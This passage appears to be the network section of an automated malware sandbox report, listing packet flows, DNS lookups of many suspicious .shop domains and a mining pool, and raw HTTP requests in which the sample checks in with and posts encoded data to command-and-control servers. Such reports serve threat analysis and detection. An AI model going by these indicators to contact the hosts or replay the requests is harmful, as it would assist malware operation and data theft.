Aug 10, 2024 16:12:25.727544069 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.727569103 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.727576017 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.727852106 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.727905035 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.728904009 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.728919983 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.728935003 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.728991032 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.728991032 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.729017973 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.729032040 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.729046106 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.729060888 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.729083061 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.729083061 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.729101896 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.729434967 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.729449034 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.729463100 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.729492903 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.729502916 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.729525089 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.729548931 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.729563951 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.729579926 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.729623079 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.729623079 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.732088089 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.732101917 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.732116938 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.732132912 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.732146025 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.732151985 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.732161999 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.732162952 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.732192039 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.732206106 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.732240915 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.732254982 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.732278109 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.732291937 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.732306957 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.732316971 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.732337952 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.732352018 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.732373953 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.732373953 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.732388020 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.732388973 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.732402086 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.732415915 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.732429981 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.732430935 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.732444048 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.732446909 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.732465982 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.732469082 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.732497931 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.732498884 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.732505083 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.732522964 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.732534885 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.732537985 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.732552052 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.732567072 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.732574940 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.732579947 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.732594967 CEST	80	49739	147.45.44.104	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Aug 10, 2024 16:12:14.917478085 CEST	192.168.2.4	1.1.1.1	0x2dd3	Standard query (0)	api.myip.com	A (IP address)	IN (0x0001)	false
Aug 10, 2024 16:12:15.857722998 CEST	192.168.2.4	1.1.1.1	0x8a1e	Standard query (0)	ipinfo.io	A (IP address)	IN (0x0001)	false
Aug 10, 2024 16:12:20.962951899 CEST	192.168.2.4	1.1.1.1	0xdc57	Standard query (0)	vk.com	A (IP address)	IN (0x0001)	false
Aug 10, 2024 16:12:20.964548111 CEST	192.168.2.4	1.1.1.1	0xeeea	Standard query (0)	helleaa.com	A (IP address)	IN (0x0001)	false
Aug 10, 2024 16:12:21.657404900 CEST	192.168.2.4	1.1.1.1	0x45d1	Standard query (0)	cdn.discordapp.com	A (IP address)	IN (0x0001)	false
Aug 10, 2024 16:12:42.216957092 CEST	192.168.2.4	1.1.1.1	0x5b56	Standard query (0)	yip.su	A (IP address)	IN (0x0001)	false
Aug 10, 2024 16:12:43.447372913 CEST	192.168.2.4	1.1.1.1	0xb26a	Standard query (0)	enfixxysdjsip.shop	A (IP address)	IN (0x0001)	false
Aug 10, 2024 16:12:44.846198082 CEST	192.168.2.4	1.1.1.1	0xc10d	Standard query (0)	celebratioopz.shop	A (IP address)	IN (0x0001)	false
Aug 10, 2024 16:12:46.489067078 CEST	192.168.2.4	1.1.1.1	0xfdb9	Standard query (0)	writerospzm.shop	A (IP address)	IN (0x0001)	false
Aug 10, 2024 16:12:46.902112961 CEST	192.168.2.4	1.1.1.1	0x18a6	Standard query (0)	deallerospfosu.shop	A (IP address)	IN (0x0001)	false
Aug 10, 2024 16:12:47.273323059 CEST	192.168.2.4	1.1.1.1	0x4d95	Standard query (0)	steamcommunity.com	A (IP address)	IN (0x0001)	false
Aug 10, 2024 16:12:48.207236052 CEST	192.168.2.4	1.1.1.1	0xa725	Standard query (0)	bassizcellskz.shop	A (IP address)	IN (0x0001)	false
Aug 10, 2024 16:12:49.032243013 CEST	192.168.2.4	1.1.1.1	0xcc2e	Standard query (0)	agent-runner-service2.com	A (IP address)	IN (0x0001)	false
Aug 10, 2024 16:12:49.222421885 CEST	192.168.2.4	1.1.1.1	0x3d34	Standard query (0)	mennyudosirso.shop	A (IP address)	IN (0x0001)	false
Aug 10, 2024 16:12:50.563689947 CEST	192.168.2.4	1.1.1.1	0xe72b	Standard query (0)	languagedscie.shop	A (IP address)	IN (0x0001)	false
Aug 10, 2024 16:12:51.851156950 CEST	192.168.2.4	1.1.1.1	0x3881	Standard query (0)	complaintsipzzx.shop	A (IP address)	IN (0x0001)	false
Aug 10, 2024 16:12:52.218807936 CEST	192.168.2.4	1.1.1.1	0x5a69	Standard query (0)	pool.hashvault.pro	A (IP address)	IN (0x0001)	false
Aug 10, 2024 16:12:53.431440115 CEST	192.168.2.4	1.1.1.1	0xe210	Standard query (0)	quialitsuzoxm.shop	A (IP address)	IN (0x0001)	false
Aug 10, 2024 16:12:54.786472082 CEST	192.168.2.4	1.1.1.1	0x78b0	Standard query (0)	steamcommunity.com	A (IP address)	IN (0x0001)	false
Aug 10, 2024 16:12:56.513947964 CEST	192.168.2.4	1.1.1.1	0xf4ad	Standard query (0)	tenntysjuxmz.shop	A (IP address)	IN (0x0001)	false
Aug 10, 2024 16:13:17.161772013 CEST	192.168.2.4	1.1.1.1	0x3bfc	Standard query (0)	arpdabl.zapto.org	A (IP address)	IN (0x0001)	false
Aug 10, 2024 16:13:19.465854883 CEST	192.168.2.4	1.1.1.1	0x2b97	Standard query (0)	agent-runner-service2.com	A (IP address)	IN (0x0001)	false
Aug 10, 2024 16:13:39.448048115 CEST	192.168.2.4	1.1.1.1	0xef37	Standard query (0)	agent-runner-service2.com	A (IP address)	IN (0x0001)	false
Aug 10, 2024 16:14:07.863485098 CEST	192.168.2.4	1.1.1.1	0x5e7d	Standard query (0)	service-domain.xyz	A (IP address)	IN (0x0001)	false
Aug 10, 2024 16:14:08.262849092 CEST	192.168.2.4	1.1.1.1	0x9d1a	Standard query (0)	api.2ip.ua	A (IP address)	IN (0x0001)	false
Aug 10, 2024 16:14:09.021933079 CEST	192.168.2.4	1.1.1.1	0xf88d	Standard query (0)	www.rapidfilestorage.com	A (IP address)	IN (0x0001)	false
Aug 10, 2024 16:14:09.386853933 CEST	192.168.2.4	1.1.1.1	0x98d8	Standard query (0)	agent-runner-service2.com	A (IP address)	IN (0x0001)	false
Aug 10, 2024 16:14:09.956401110 CEST	192.168.2.4	1.1.1.1	0xf873	Standard query (0)	helsinki-dtc.com	A (IP address)	IN (0x0001)	false
Aug 10, 2024 16:14:10.705023050 CEST	192.168.2.4	1.1.1.1	0x6a90	Standard query (0)	skrptfiles.tracemonitors.com	A (IP address)	IN (0x0001)	false
Aug 10, 2024 16:14:11.062144995 CEST	192.168.2.4	1.1.1.1	0x30a3	Standard query (0)	clients2.googleusercontent.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Aug 10, 2024 16:12:14.927875996 CEST	1.1.1.1	192.168.2.4	0x2dd3	No error (0)	api.myip.com		104.26.8.59	A (IP address)	IN (0x0001)	false
Aug 10, 2024 16:12:14.927875996 CEST	1.1.1.1	192.168.2.4	0x2dd3	No error (0)	api.myip.com		172.67.75.163	A (IP address)	IN (0x0001)	false
Aug 10, 2024 16:12:14.927875996 CEST	1.1.1.1	192.168.2.4	0x2dd3	No error (0)	api.myip.com		104.26.9.59	A (IP address)	IN (0x0001)	false
Aug 10, 2024 16:12:15.865113020 CEST	1.1.1.1	192.168.2.4	0x8a1e	No error (0)	ipinfo.io		34.117.59.81	A (IP address)	IN (0x0001)	false
Aug 10, 2024 16:12:20.971677065 CEST	1.1.1.1	192.168.2.4	0xdc57	No error (0)	vk.com		87.240.132.78	A (IP address)	IN (0x0001)	false
Aug 10, 2024 16:12:20.971677065 CEST	1.1.1.1	192.168.2.4	0xdc57	No error (0)	vk.com		93.186.225.194	A (IP address)	IN (0x0001)	false
Aug 10, 2024 16:12:20.971677065 CEST	1.1.1.1	192.168.2.4	0xdc57	No error (0)	vk.com		87.240.132.72	A (IP address)	IN (0x0001)	false
Aug 10, 2024 16:12:20.971677065 CEST	1.1.1.1	192.168.2.4	0xdc57	No error (0)	vk.com		87.240.137.164	A (IP address)	IN (0x0001)	false
Aug 10, 2024 16:12:20.971677065 CEST	1.1.1.1	192.168.2.4	0xdc57	No error (0)	vk.com		87.240.132.67	A (IP address)	IN (0x0001)	false
Aug 10, 2024 16:12:20.971677065 CEST	1.1.1.1	192.168.2.4	0xdc57	No error (0)	vk.com		87.240.129.133	A (IP address)	IN (0x0001)	false
Aug 10, 2024 16:12:20.980921030 CEST	1.1.1.1	192.168.2.4	0xeeea	No error (0)	helleaa.com		162.0.209.124	A (IP address)	IN (0x0001)	false
Aug 10, 2024 16:12:21.401196957 CEST	1.1.1.1	192.168.2.4	0x4c50	No error (0)	fp2e7a.wpc.2be4.phicdn.net	fp2e7a.wpc.phicdn.net		CNAME (Canonical name)	IN (0x0001)	false
Aug 10, 2024 16:12:21.401196957 CEST	1.1.1.1	192.168.2.4	0x4c50	No error (0)	fp2e7a.wpc.phicdn.net		192.229.221.95	A (IP address)	IN (0x0001)	false
Aug 10, 2024 16:12:21.665201902 CEST	1.1.1.1	192.168.2.4	0x45d1	No error (0)	cdn.discordapp.com		162.159.130.233	A (IP address)	IN (0x0001)	false
Aug 10, 2024 16:12:21.665201902 CEST	1.1.1.1	192.168.2.4	0x45d1	No error (0)	cdn.discordapp.com		162.159.129.233	A (IP address)	IN (0x0001)	false
Aug 10, 2024 16:12:21.665201902 CEST	1.1.1.1	192.168.2.4	0x45d1	No error (0)	cdn.discordapp.com		162.159.133.233	A (IP address)	IN (0x0001)	false
Aug 10, 2024 16:12:21.665201902 CEST	1.1.1.1	192.168.2.4	0x45d1	No error (0)	cdn.discordapp.com		162.159.134.233	A (IP address)	IN (0x0001)	false
Aug 10, 2024 16:12:21.665201902 CEST	1.1.1.1	192.168.2.4	0x45d1	No error (0)	cdn.discordapp.com		162.159.135.233	A (IP address)	IN (0x0001)	false
Aug 10, 2024 16:12:42.226938009 CEST	1.1.1.1	192.168.2.4	0x5b56	No error (0)	yip.su		188.114.97.3	A (IP address)	IN (0x0001)	false
Aug 10, 2024 16:12:42.226938009 CEST	1.1.1.1	192.168.2.4	0x5b56	No error (0)	yip.su		188.114.96.3	A (IP address)	IN (0x0001)	false
Aug 10, 2024 16:12:43.460154057 CEST	1.1.1.1	192.168.2.4	0xb26a	No error (0)	enfixxysdjsip.shop		104.21.76.141	A (IP address)	IN (0x0001)	false
Aug 10, 2024 16:12:43.460154057 CEST	1.1.1.1	192.168.2.4	0xb26a	No error (0)	enfixxysdjsip.shop		172.67.196.26	A (IP address)	IN (0x0001)	false
Aug 10, 2024 16:12:44.861285925 CEST	1.1.1.1	192.168.2.4	0xc10d	No error (0)	celebratioopz.shop		104.21.47.141	A (IP address)	IN (0x0001)	false
Aug 10, 2024 16:12:44.861285925 CEST	1.1.1.1	192.168.2.4	0xc10d	No error (0)	celebratioopz.shop		172.67.171.80	A (IP address)	IN (0x0001)	false
Aug 10, 2024 16:12:46.506346941 CEST	1.1.1.1	192.168.2.4	0xfdb9	No error (0)	writerospzm.shop		104.21.16.74	A (IP address)	IN (0x0001)	false
Aug 10, 2024 16:12:46.506346941 CEST	1.1.1.1	192.168.2.4	0xfdb9	No error (0)	writerospzm.shop		172.67.166.231	A (IP address)	IN (0x0001)	false
Aug 10, 2024 16:12:46.916238070 CEST	1.1.1.1	192.168.2.4	0x18a6	No error (0)	deallerospfosu.shop		104.21.69.39	A (IP address)	IN (0x0001)	false
Aug 10, 2024 16:12:46.916238070 CEST	1.1.1.1	192.168.2.4	0x18a6	No error (0)	deallerospfosu.shop		172.67.204.20	A (IP address)	IN (0x0001)	false
Aug 10, 2024 16:12:47.280179024 CEST	1.1.1.1	192.168.2.4	0x4d95	No error (0)	steamcommunity.com		92.122.104.90	A (IP address)	IN (0x0001)	false
Aug 10, 2024 16:12:48.220793962 CEST	1.1.1.1	192.168.2.4	0xa725	No error (0)	bassizcellskz.shop		188.114.96.3	A (IP address)	IN (0x0001)	false
Aug 10, 2024 16:12:48.220793962 CEST	1.1.1.1	192.168.2.4	0xa725	No error (0)	bassizcellskz.shop		188.114.97.3	A (IP address)	IN (0x0001)	false
Aug 10, 2024 16:12:49.195856094 CEST	1.1.1.1	192.168.2.4	0xcc2e	No error (0)	agent-runner-service2.com		95.164.44.107	A (IP address)	IN (0x0001)	false
Aug 10, 2024 16:12:49.236370087 CEST	1.1.1.1	192.168.2.4	0x3d34	No error (0)	mennyudosirso.shop		104.21.73.43	A (IP address)	IN (0x0001)	false
Aug 10, 2024 16:12:49.236370087 CEST	1.1.1.1	192.168.2.4	0x3d34	No error (0)	mennyudosirso.shop		172.67.140.31	A (IP address)	IN (0x0001)	false
Aug 10, 2024 16:12:50.582096100 CEST	1.1.1.1	192.168.2.4	0xe72b	No error (0)	languagedscie.shop		188.114.97.3	A (IP address)	IN (0x0001)	false
Aug 10, 2024 16:12:50.582096100 CEST	1.1.1.1	192.168.2.4	0xe72b	No error (0)	languagedscie.shop		188.114.96.3	A (IP address)	IN (0x0001)	false
Aug 10, 2024 16:12:51.873132944 CEST	1.1.1.1	192.168.2.4	0x3881	No error (0)	complaintsipzzx.shop		104.21.14.101	A (IP address)	IN (0x0001)	false
Aug 10, 2024 16:12:51.873132944 CEST	1.1.1.1	192.168.2.4	0x3881	No error (0)	complaintsipzzx.shop		172.67.158.159	A (IP address)	IN (0x0001)	false
Aug 10, 2024 16:12:52.227813959 CEST	1.1.1.1	192.168.2.4	0x5a69	No error (0)	pool.hashvault.pro		45.76.89.70	A (IP address)	IN (0x0001)	false
Aug 10, 2024 16:12:52.227813959 CEST	1.1.1.1	192.168.2.4	0x5a69	No error (0)	pool.hashvault.pro		95.179.241.203	A (IP address)	IN (0x0001)	false
Aug 10, 2024 16:12:53.664854050 CEST	1.1.1.1	192.168.2.4	0xe210	No error (0)	quialitsuzoxm.shop		188.114.97.3	A (IP address)	IN (0x0001)	false
Aug 10, 2024 16:12:53.664854050 CEST	1.1.1.1	192.168.2.4	0xe210	No error (0)	quialitsuzoxm.shop		188.114.96.3	A (IP address)	IN (0x0001)	false
Aug 10, 2024 16:12:54.793715954 CEST	1.1.1.1	192.168.2.4	0x78b0	No error (0)	steamcommunity.com		92.122.104.90	A (IP address)	IN (0x0001)	false
Aug 10, 2024 16:12:56.528146982 CEST	1.1.1.1	192.168.2.4	0xf4ad	No error (0)	tenntysjuxmz.shop		188.114.96.3	A (IP address)	IN (0x0001)	false
Aug 10, 2024 16:12:56.528146982 CEST	1.1.1.1	192.168.2.4	0xf4ad	No error (0)	tenntysjuxmz.shop		188.114.97.3	A (IP address)	IN (0x0001)	false
Aug 10, 2024 16:13:17.178271055 CEST	1.1.1.1	192.168.2.4	0x3bfc	No error (0)	arpdabl.zapto.org		38.180.132.96	A (IP address)	IN (0x0001)	false
Aug 10, 2024 16:13:19.858382940 CEST	1.1.1.1	192.168.2.4	0x2b97	No error (0)	agent-runner-service2.com		95.164.44.107	A (IP address)	IN (0x0001)	false
Aug 10, 2024 16:13:39.626080036 CEST	1.1.1.1	192.168.2.4	0xef37	No error (0)	agent-runner-service2.com		95.164.44.107	A (IP address)	IN (0x0001)	false
Aug 10, 2024 16:14:07.958724022 CEST	1.1.1.1	192.168.2.4	0x5e7d	No error (0)	service-domain.xyz		54.210.117.250	A (IP address)	IN (0x0001)	false
Aug 10, 2024 16:14:08.273185968 CEST	1.1.1.1	192.168.2.4	0x9d1a	No error (0)	api.2ip.ua		188.114.96.3	A (IP address)	IN (0x0001)	false
Aug 10, 2024 16:14:08.273185968 CEST	1.1.1.1	192.168.2.4	0x9d1a	No error (0)	api.2ip.ua		188.114.97.3	A (IP address)	IN (0x0001)	false
Aug 10, 2024 16:14:09.118920088 CEST	1.1.1.1	192.168.2.4	0xf88d	No error (0)	www.rapidfilestorage.com	env-3936544.jcloud.kz		CNAME (Canonical name)	IN (0x0001)	false
Aug 10, 2024 16:14:09.118920088 CEST	1.1.1.1	192.168.2.4	0xf88d	No error (0)	env-3936544.jcloud.kz		185.22.66.16	A (IP address)	IN (0x0001)	false
Aug 10, 2024 16:14:09.118920088 CEST	1.1.1.1	192.168.2.4	0xf88d	No error (0)	env-3936544.jcloud.kz		185.22.66.15	A (IP address)	IN (0x0001)	false
Aug 10, 2024 16:14:09.394464016 CEST	1.1.1.1	192.168.2.4	0x98d8	No error (0)	agent-runner-service2.com		95.164.44.107	A (IP address)	IN (0x0001)	false
Aug 10, 2024 16:14:10.005348921 CEST	1.1.1.1	192.168.2.4	0xf873	No error (0)	helsinki-dtc.com		194.67.87.38	A (IP address)	IN (0x0001)	false
Aug 10, 2024 16:14:10.717133999 CEST	1.1.1.1	192.168.2.4	0x6a90	No error (0)	skrptfiles.tracemonitors.com	d1u0l9f6kr1di3.cloudfront.net		CNAME (Canonical name)	IN (0x0001)	false
Aug 10, 2024 16:14:10.717133999 CEST	1.1.1.1	192.168.2.4	0x6a90	No error (0)	d1u0l9f6kr1di3.cloudfront.net		13.32.145.29	A (IP address)	IN (0x0001)	false
Aug 10, 2024 16:14:10.717133999 CEST	1.1.1.1	192.168.2.4	0x6a90	No error (0)	d1u0l9f6kr1di3.cloudfront.net		13.32.145.32	A (IP address)	IN (0x0001)	false
Aug 10, 2024 16:14:10.717133999 CEST	1.1.1.1	192.168.2.4	0x6a90	No error (0)	d1u0l9f6kr1di3.cloudfront.net		13.32.145.13	A (IP address)	IN (0x0001)	false
Aug 10, 2024 16:14:10.717133999 CEST	1.1.1.1	192.168.2.4	0x6a90	No error (0)	d1u0l9f6kr1di3.cloudfront.net		13.32.145.23	A (IP address)	IN (0x0001)	false
Aug 10, 2024 16:14:11.069582939 CEST	1.1.1.1	192.168.2.4	0x30a3	No error (0)	clients2.googleusercontent.com	googlehosted.l.googleusercontent.com		CNAME (Canonical name)	IN (0x0001)	false
Aug 10, 2024 16:14:11.069582939 CEST	1.1.1.1	192.168.2.4	0x30a3	No error (0)	googlehosted.l.googleusercontent.com		142.250.185.193	A (IP address)	IN (0x0001)	false

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49731	147.45.47.169	80	7008	C:\Users\user\Desktop\284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe

Timestamp	Bytes transferred	Direction	Data
Aug 10, 2024 16:12:06.240593910 CEST	205	OUT	GET /api/crazyfish.php HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Host: 147.45.47.169

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49732	185.225.200.214	80	7008	C:\Users\user\Desktop\284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe

Timestamp	Bytes transferred	Direction	Data
Aug 10, 2024 16:12:14.249187946 CEST	207	OUT	GET /api/crazyfish.php HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Host: 185.225.200.214
Aug 10, 2024 16:12:14.905175924 CEST	259	IN	HTTP/1.1 200 OK Date: Sat, 10 Aug 2024 14:12:14 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 6 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 66 69 73 68 31 35 Data Ascii: fish15
Aug 10, 2024 16:12:19.352654934 CEST	276	OUT	POST /api/twofish.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Content-Length: 133 Host: 185.225.200.214
Aug 10, 2024 16:12:19.352788925 CEST	133	OUT	Data Raw: 64 61 74 61 3d 4c 59 76 75 6b 58 42 67 74 72 6a 68 53 45 31 2d 6d 47 41 68 7a 44 6c 35 4a 75 47 6c 42 54 62 79 5f 55 35 48 31 4d 67 44 66 4e 6e 6a 46 74 34 34 5a 46 6a 64 33 43 41 6d 6a 6e 45 6d 75 6a 30 71 52 50 63 44 75 7a 65 50 70 47 57 58 44 Data Ascii: data=LYvukXBgtrjhSE1-mGAhzDl5JuGlBTby_U5H1MgDfNnjFt44ZFjd3CAmjnEmuj0qRPcDuzePpGWXDm005B2ZbhAbxzGvCvSoe-mlqs3wFXd2xS_sLxVCB_Oet1l81GEU
Aug 10, 2024 16:12:20.689623117 CEST	1236	IN	HTTP/1.1 200 OK Date: Sat, 10 Aug 2024 14:12:19 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 2028 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 46 66 69 4f 4d 4c 58 63 68 73 2f 62 73 4c 45 38 34 59 56 66 6b 64 6e 7a 44 62 48 52 59 52 63 78 4f 6b 73 6d 45 57 58 31 43 48 44 72 33 31 4b 52 77 49 65 33 6c 32 46 2f 32 75 59 57 31 2f 54 49 59 4b 35 56 71 76 2b 61 4d 74 53 41 78 68 78 73 69 72 75 31 6b 4c 2b 55 50 2b 63 66 73 6d 66 76 79 33 48 32 52 72 6d 62 50 79 36 33 62 4e 32 79 45 62 6e 7a 53 2b 54 39 65 70 56 30 70 79 7a 62 5a 41 63 4b 4b 32 53 49 34 75 33 4c 6a 68 63 48 61 64 56 4d 50 65 42 70 34 42 75 64 58 42 4a 7a 59 48 76 42 42 66 2f 45 73 54 76 6a 47 59 5a 58 34 4f 30 4a 45 68 54 57 34 6e 2f 35 2b 68 68 5a 4d 52 61 66 35 47 41 54 48 59 51 38 75 45 66 49 6a 56 36 37 6a 63 30 61 4c 72 35 65 46 38 39 74 6c 33 31 63 61 78 34 54 4e 4d 4e 52 44 30 5a 32 67 74 77 52 65 69 30 68 56 54 71 48 66 61 56 4d 6c 57 52 4e 47 45 79 72 30 62 59 32 2f 52 63 43 62 46 66 67 4a 53 58 4d 65 55 75 64 65 2f 48 70 76 71 73 62 53 33 4e 32 68 58 58 32 5a 69 72 36 36 47 73 37 61 7a 6d 7a 31 49 6b 70 61 68 70 78 2f 45 31 66 70 58 36 78 2b 37 45 67 48 4f 34 65 55 30 [TRUNCATED] Data Ascii: FfiOMLXchs/bsLE84YVfkdnzDbHRYRcxOksmEWX1CHDr31KRwIe3l2F/2uYW1/TIYK5Vqv+aMtSAxhxsiru1kL+UP+cfsmfvy3H2RrmbPy63bN2yEbnzS+T9epV0pyzbZAcKK2SI4u3LjhcHadVMPeBp4BudXBJzYHvBBf/EsTvjGYZX4O0JEhTW4n/5+hhZMRaf5GATHYQ8uEfIjV67jc0aLr5eF89tl31cax4TNMNRD0Z2gtwRei0hVTqHfaVMlWRNGEyr0bY2/RcCbFfgJSXMeUude/HpvqsbS3N2hXX2Zir66Gs7azmz1Ikpahpx/E1fpX6x+7EgHO4eU0JTJF+hdEz7Ocx23HSJf159ewDrdUoc+AYQ7fNagB9fgZt62iZY8ItC0VWOYJ29mo4jUNjAESh2Uj7WdsBG7o+xdPIo0bB8YQ0zLTUbyNFW5Inv/ujYcd9j75d9f6fTf1FxRCCqpfi448idBnxJ3iRBICuDxzyMKyWbnM15nNbWZcKTt6qabV/dRNXHdtxkF8rBpvlwP6HD6zcnlJNVC5HhaNwWZPz0KAfLcjXykjAkilw8CfXfCzt7hBGMok3Src5rsa/mrnVGGxuT29dxtFVgJeP9qAiCI60nBKM8/QWqP5/FxMQsYgrFLhOvjVYEQF6tQtJNa2SJUaP1Lnyx8M4dToj37s0k6eLjEAYeVLnBHcKJAk1SGu1sixCbr/E0SypyQB/sEx9LQGrhX2z/z98oOLqE5K6lihnvv1S2C6qJSVNvDBpCFpLQKc5TfC6MuDUnwbZJgOtPctMtHkVIzlPrUWoTeu2DrW2OE96rp/8ptbjzaFOguV+Eulfgn+NUAasQZyS208UXJ30i0Jr6nTSObvxHZINI0SCcXWkL9UG9tJUlrmSJNHaLk7hCCCPojFT2QJ1Q5AJcpciV18XphYoehTakxV4ghz9LsJZBOSqWVga5Mov09XwRW2muBcAXzDJ/R
Aug 10, 2024 16:12:20.689905882 CEST	64	IN	Data Raw: 48 54 67 56 79 49 38 31 54 33 34 74 4f 65 63 56 76 65 37 68 4f 4a 49 31 69 55 55 34 42 4d 31 38 30 48 38 49 34 43 7a 2b 6d 4d 46 5a 56 53 78 68 43 68 2b 41 32 42 4b 42 75 63 38 5a 4f 74 61 72 Data Ascii: HTgVyI81T34tOecVve7hOJI1iUU4BM180H8I4Cz+mMFZVSxhCh+A2BKBuc8ZOtar
